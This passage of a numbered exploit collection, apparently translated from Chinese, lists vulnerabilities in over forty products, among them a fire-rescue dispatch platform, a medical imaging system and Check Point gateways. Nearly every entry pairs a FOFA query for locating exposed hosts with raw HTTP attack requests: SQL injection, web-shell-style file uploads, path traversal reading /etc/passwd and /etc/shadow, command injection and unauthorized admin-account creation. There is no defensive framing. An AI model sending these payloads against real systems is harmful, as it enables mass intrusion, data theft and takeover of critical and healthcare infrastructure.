User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire rescue combat dispatch platform (天维尔消防救援作战调度平台) SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical imaging PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license-plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewer deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 (ESAFENET) electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 host security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 (Volans) internet behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
